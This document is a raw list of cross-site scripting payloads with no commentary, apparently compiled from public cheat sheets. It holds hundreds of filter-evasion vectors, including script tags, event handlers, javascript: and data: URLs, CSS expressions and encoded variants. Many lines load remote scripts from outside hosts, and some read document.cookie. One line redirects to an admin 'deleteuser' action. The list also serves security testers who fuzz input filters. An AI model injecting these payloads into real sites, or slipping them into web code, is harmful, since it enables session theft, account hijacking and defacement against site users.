<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<XSS STYLE=\"xss:expression(alert('XSS'))\">
<XSS STYLE=\"behavior: url(xss.htc);\">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">
<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<BASE HREF=\"javascript:alert('XSS');//\">
 <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
 <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<iframe  src=\"&Tab;javascript:prompt(1)&Tab;\">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<img/src=`` onerror=this.onerror=confirm(1) 
<form><isindex formaction=\"javascript&colon;confirm(1)\"
<img src=``&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">
<script /**/>/**/alert(1)/**/</script /**/
&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>
<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">
<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X
</script><img/*/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/*/onerror='eval(src)'>
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(1)\"&#11;&#10;&#09;;>
<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a
http://www.google<script .com>alert(document.location)</script
<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a
<img/src=@&#32;&#13; onerror = prompt('&#49;')
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
&#00;</form><input type&#61;\"date\" onfocus=\"alert(1)\">
<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>
<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style=\"width:expression(confirm(1))\">X</div> {IE7}
<iframe// src=javaSCRIPT&colon;alert(1)
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>
//|\\\\ <script //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\\\ </script //|\\\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">
</plaintext\\></|\\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">
<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>
<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">
<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">
<var onmouseover=\"prompt(1)\">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">
<%<!--'%><script>alert(1);</script -->
<script src=\"data:text/javascript,alert(1)\"></script>
<iframe/src \\/\\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type=\"text\" value=`` <div/onmouseover='alert(1)'>X</div>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>
<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>
<math><a xlink:href=\"//jsfiddle.net/t846h/\">click
<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a
<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>
<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+
<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F
<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\\/onerror = alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style=\"x:\">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>
\"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<math><a xlink:href=\"//jsfiddle.net/t846h/\">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>
<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>

'';!--\"<XSS>=&{()}
'>//\\\\,<'>\">\">\"*\"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script> 
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\\port'\\ja\\vasc\\ript:alert(\\\"XSS\\\")';</style>
<? echo('<scr)'; echo('ipt>alert(\\\"XSS\\\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\\\"jav&#x09;ascript:alert('XSS');\\\">
<IMG SRC=\\\"jav&#x0A;ascript:alert('XSS');\\\">
<IMG SRC=\\\"jav&#x0D;ascript:alert('XSS');\\\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
\"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\\\"javascript:alert('XSS')\\\">
<IMG DYNSRC=\\\"javascript:alert('XSS')\\\">
<font style='color:expression(alert(document.cookie))'>
<img src=\"javascript:alert('XSS')\">
<script language=\"JavaScript\">alert('XSS')</script>
<body onunload=\"javascript:alert('XSS');\">
<body onLoad=\"alert('XSS');\"
[color=red' onmouseover=\"alert('xss')\"]mouse over[/color]
\"/></a></><img src=1.gif onerror=alert(1)>
window.alert(\"Bonjour !\");
<div style=\"x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))\">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
\"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'\">><script>alert('XSS')</script>
'\">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert('XSS');\\\">
<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:alert('XSS');\\\">
<script>var var = 1; alert(var)</script>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<?='<SCRIPT>alert(\"XSS\")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\\\"XSS\\\")'>
\" onfocus=alert(document.domain) \"> <\"
<FRAMESET><FRAME SRC=\\\"javascript:alert('XSS');\\\"></FRAMESET>
<STYLE>li {list-style-image: url(\\\"javascript:alert('XSS')\\\");}</STYLE><UL><LI>XSS
perl -e 'print \\\"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\\\";' > out
perl -e 'print \\\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\\\";' > out
<br size=\\\"&{alert('XSS')}\\\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
\"><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>
[color=red width=expression(alert(123))][color]
<BASE HREF=\"javascript:alert('XSS');//\">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
\"></iframe><script>alert(123)</script>
<body onLoad=\"while(true) alert('XSS');\">
'\"></title><script>alert(1111)</script>
</textarea>'\"><script>alert(document.cookie)</script>
'\"\"><script language=\"JavaScript\"> alert('X \\nS \\nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
'></select><script>alert(123)</script>
'>\"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write(\"XSS\");</SCRIPT>
a=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('xss');\";eval(a+b+c+d);
='><script>alert(\"xss\")</script>
<script+src=\">\"+src=\"http://yoursite.com/xss.js?69,69\"></script>
<body background=javascript:'\"><script>alert(navigator.userAgent)</script>></body>
\">/XaDoS/><script>alert(document.cookie)</script><script src=\"http://www.site.com/XSS.js\"></script>
\">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src=\"http://www.site.com/XSS.js\"></script>
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--\" /><script>alert('xss');</script>
<script>alert(\"XSS by \\nxss\")</script><marquee><h1>XSS by xss</h1></marquee>
\"><script>alert(\"XSS by \\nxss\")</script>><marquee><h1>XSS by xss</h1></marquee>
'\"></title><script>alert(\"XSS by \\nxss\")</script>><marquee><h1>XSS by xss</h1></marquee>
<img \"\"\"><script>alert(\"XSS by \\nxss\")</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
\"><script>alert(1337)</script>\"><script>alert(\"XSS by \\nxss</h1></marquee>
'\"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src=\"javascript:alert('XSS by \\nxss');\"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\"\" alt='
\"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\"\" alt=\"
\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\"\" alt=\\'
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
'); alert('xss'); var x='
\\\\'); alert(\\'xss\\');var x=\\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
>\"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
<img src=\"Mario Heiderich says that svg SHOULD not be executed trough image tags\" onerror=\"javascript:document.write('\\u003c\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u0020\\u0073\\u0072\\u0063\\u003d\\u0022\\u0064\\u0061\\u0074\\u0061\\u003a\\u0069\\u006d\\u0061\\u0067\\u0065\\u002f\\u0073\\u0076\\u0067\\u002b\\u0078\\u006d\\u006c\\u003b\\u0062\\u0061\\u0073\\u0065\\u0036\\u0034\\u002c\\u0050\\u0048\\u004e\\u0032\\u005a\\u0079\\u0042\\u0034\\u0062\\u0057\\u0078\\u0075\\u0063\\u007a\\u0030\\u0069\\u0061\\u0048\\u0052\\u0030\\u0063\\u0044\\u006f\\u0076\\u004c\\u0033\\u0064\\u0033\\u0064\\u0079\\u0035\\u0033\\u004d\\u0079\\u0035\\u0076\\u0063\\u006d\\u0063\\u0076\\u004d\\u006a\\u0041\\u0077\\u004d\\u0043\\u0039\\u007a\\u0064\\u006d\\u0063\\u0069\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u0070\\u0062\\u0057\\u0046\\u006e\\u005a\\u0053\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0045\\u0070\\u0049\\u006a\\u0034\\u0038\\u004c\\u0032\\u006c\\u0074\\u0059\\u0057\\u0064\\u006c\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u007a\\u0064\\u006d\\u0063\\u0067\\u0062\\u0032\\u0035\\u0073\\u0062\\u0032\\u0046\\u006b\\u0050\\u0053\\u004a\\u0068\\u0062\\u0047\\u0056\\u0079\\u0064\\u0043\\u0067\\u0079\\u004b\\u0053\\u0049\\u002b\\u0050\\u0043\\u0039\\u007a\\u0064\\u006d\\u0063\\u002b\\u0049\\u0043\\u0041\\u004b\\u0049\\u0043\\u0041\\u0067\\u0050\\u0048\\u004e\\u006a\\u0063\\u006d\\u006c\\u0077\\u0064\\u0044\\u0035\\u0068\\u0062\\u0047\\u0056\\u0079\\u0064\\u0043\\u0067\\u007a\\u004b\\u0054\\u0077\\u0076\\u0063\\u0032\\u004e\\u0079\\u0061\\u0058\\u0042\\u0030\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u006b\\u005a\\u0057\\u005a\\u007a\\u0049\\u0047\\u0039\\u0075\\u0062\\u0047\\u0039\\u0068\\u005a\\u0044\\u0030\\u0069\\u0059\\u0057\\u0078\\u006c\\u0063\\u006e\\u0051\\u006f\\u004e\\u0043\\u006b\\u0069\\u0050\\u006a\\u0077\\u0076\\u005a\\u0047\\u0056\\u006d\\u0063\\u007a\\u0034\\u0067\\u0049\\u0041\\u006f\\u0067\\u0049\\u0043\\u0041\\u0038\\u005a\\u0079\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0055\\u0070\\u0049\\u006a\\u0034\\u0067\\u0049\\u0041\\u006f\\u0067\\u0049\\u0043\\u0041\\u0067\\u0049\\u0043\\u0041\\u0067\\u0050\\u0047\\u004e\\u0070\\u0063\\u006d\\u004e\\u0073\\u005a\\u0053\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0059\\u0070\\u0049\\u0069\\u0041\\u0076\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0043\\u0041\\u0067\\u0049\\u0043\\u0041\\u0038\\u0064\\u0047\\u0056\\u0034\\u0064\\u0043\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0063\\u0070\\u0049\\u006a\\u0034\\u0038\\u004c\\u0033\\u0052\\u006c\\u0065\\u0048\\u0051\\u002b\\u0049\\u0043\\u0041\\u004b\\u0049\\u0043\\u0041\\u0067\\u0050\\u0043\\u0039\\u006e\\u0050\\u0069\\u0041\\u0067\\u0043\\u006a\\u0077\\u0076\\u0063\\u0033\\u005a\\u006e\\u0050\\u0069\\u0041\\u0067\\u0022\\u003e\\u003c\\u002f\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u003e');\"></img>
</body>
</html>
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT> alert(“XSS”); </SCRIPT>
<BODY ONLOAD=alert(\"XSS\")>
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<IMG SRC=\"javascript:alert('XSS');\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://hacker.com/xss.html\">
<EMBED SRC=\"http://hacker.com/xss.swf\" AllowScriptAccess=\"always\">
&apos;;alert(String.fromCharCode(88,83,83))//\\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;;/SCRIPT&gt;&quot;&gt;&apos;&gt;;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
exp/*&lt;XSS STYLE=&apos;no\\xss:noxss(&quot;*//*&quot;);
&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
